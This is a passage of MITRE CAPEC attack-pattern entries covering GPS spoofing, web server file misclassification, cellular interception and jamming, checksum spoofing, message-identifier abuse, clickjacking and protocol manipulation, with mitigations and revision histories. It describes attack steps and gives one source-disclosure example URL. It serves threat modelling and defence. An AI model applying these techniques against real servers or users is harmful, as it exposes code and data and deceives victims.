Strong physical security can help reduce the ability of an adversary to install a keylogger.

Related Weaknesses

Some type of access control weakness (CWE-284 or its descendants) is related to this CAPEC, probably as a prerequisite.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1056.001	Input Capture:Keylogging

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-628: Carry-Off GPS Attack

Attack Pattern ID: 628

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	627	Counterfeit GPS Signals

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The target must be relying on valid GPS signal to perform critical operations.

Skills Required

[Level: High]

This attack requires advanced knoweldge in GPS technology.

Example Instances

A "proof-of-concept" attack was successfully performed in June, 2013, when the luxury yacht "White Rose" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-489] "Wikipedia". GPS Spooking. The Wikimedia Foundation, Inc. <https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing>.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns

CAPEC-11: Cause Web Server Misclassification

Attack Pattern ID: 11

Abstraction: Detailed

View customized information:

Description

Extended Description

This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	635	Alternative Execution Due to Deceptive Filenames

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Footprint file input vectors: Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.

Techniques
Attacker manually crawls application to identify file inputs
Attacker uses an automated tool to crawl application identify file inputs
Attacker manually assesses strength of access control protecting native application files from user control
Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests

Experiment

File misclassification shotgunning: An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.

Techniques
Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.

File misclassification sniping: Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.

Techniques
Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.

Exploit

Disclose information: The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).
Techniques
Manipulate the file names that are explicitly sent to the server.
Manipulate the MIME sent in order to confuse the web server.

Prerequisites

Web server software must rely on file name or file extension for processing.

The attacker must be able to make HTTP requests to the web server.

Skills Required

[Level: Low]

To modify file name or file extension

[Level: Medium]

To use misclassification to force the Web server to disclose configuration information, source, or binary data

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Implementation: Server routines should be determined by content not determined by filename or file extension.

Example Instances

J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.

http://victim.site/login.jsp.

Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.

[REF-6]

Related Weaknesses

CWE-ID	Weakness Name
430	Deployment of Wrong Handler

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1036.006	Masquerading: Space after Filename

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-6] "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204)". SecurityFocus. <http://www.securityfocus.com/bid/17204/info>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Attack_Patterns, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Taxonomy_Mappings

CAPEC-618: Cellular Broadcast Message Request

Attack Pattern ID: 618

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The attacker must have knowledge of the target’s mobile phone number.

Skills Required

[Level: Low]

Open source and commercial tools are available for this attack.

Consequences

Scope	Impact	Likelihood
Other	Other

Mitigations

Frequent changing of mobile number.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-487] Denis Foo Kune, John Koelndorfer, Nicholas Hopper and Yongdae Kim. "Location Leaks on the GSM Air Interface". University of Minnesota. <https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description Summary, References

CAPEC-610: Cellular Data Injection

Attack Pattern ID: 610

Abstraction: Standard

View customized information:

Description

Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	240	Resource Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

None

Skills Required

[Level: High]

Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Availability	Modify Data

Mitigations

Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction

CAPEC-605: Cellular Jamming

Attack Pattern ID: 605

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	601	Jamming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)

Skills Required

[Level: Low]

This attack can be performed by low capability attackers with commercially available tools.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption

Mitigations

Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences

CAPEC-617: Cellular Rogue Base Station

Attack Pattern ID: 617

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

None

Skills Required

[Level: Low]

This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Passively monitor cellular network connection for real-time threat detection and logging for manual review.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-609: Cellular Traffic Intercept

Attack Pattern ID: 609

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	157	Sniffing Attacks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

None

Skills Required

[Level: Medium]

Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for "rogue" BTS stations is poor in many areas and it is assumed that "rogue" BTS stations exist in urban areas.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.

Related Weaknesses

CWE-ID	Weakness Name
311	Missing Encryption of Sensitive Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1111	Multi-Factor Authentication Interception

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-145: Checksum Spoofing

Attack Pattern ID: 145

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.

The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.

The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack.

Resources Required

The adversary must have a utility that can intercept and modify messages between the sender and recipient.

Related Weaknesses

CWE-ID	Weakness Name
354	Improper Validation of Integrity Check Value

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Related_Weaknesses

CAPEC-12: Choosing Message Identifier

Attack Pattern ID: 12

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	216	Communication Channel Manipulation
PeerOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Determine Nature of Messages: Determine the nature of messages being transported as well as the identifiers to be used as part of the attack

Experiment

Authenticate: If required, authenticate to the distribution channel
Identify Known Client Identifiers: If any particular client's information is available through a control channel available to all users, the adversary will discover particular identifiers for targeted clients by observing this channel, or requesting client information through this channel.
Change Message Identifier: Adversaries with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.

Prerequisites

Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.

Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves.

Skills Required

[Level: Low]

All the adversary needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages.

Resources Required

The adversary needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.

The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.

Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.

Example Instances

A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single "Partners" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Adversaries having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows adversaries without partner status from conducting this attack.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data
306	Missing Authentication for Critical Function

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Resources_Required, Skills_Required
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Choosing a Message/Channel Identifier on a Public/Multicast Channel

CAPEC-103: Clickjacking

Attack Pattern ID: 103

Abstraction: Standard

View customized information:

Description

Extended Description

While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	173	Action Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	181	Flash File Overlay
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	222	iFrame Overlay
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	587	Cross Frame Scripting (XFS)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Experiment

Craft a clickjacking page: The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page

Techniques
The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page
The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page
The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
The adversary leveraged cross-frame scripting to craft a malicious clickjacking page

Exploit

Adversary lures victim to clickjacking page: Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.

Techniques
Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
Lure the victim to the malicious site through a cross-site scripting attack.

Trick victim into interacting with the clickjacking page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.
Techniques
Hide action controls over very commonly used functionality.
Hide action controls over very psychologically tempting content.

Prerequisites

The victim is communicating with the target application via a web based UI and not a thick client

The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.

The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)

The victim has an active session with the target system.

The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system

Skills Required

[Level: High]

Crafting the proper malicious site and luring the victim to this site are not trivial tasks.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data
Confidentiality	Read Data
Availability	Unreliable Execution

Mitigations

If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.

Turn off JavaScript, Flash and disable CSS.

When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.

Example Instances

A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.

In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Clickjacking

References

[REF-619] "OWASP Web Security Testing Guide". Testing for Clickjacking. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

CAPEC-220: Client-Server Protocol Manipulation

Attack Pattern ID: 220

Abstraction: Standard

View customized information:

Description

Extended Description

For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	272	Protocol Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	5	Blue Boxing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
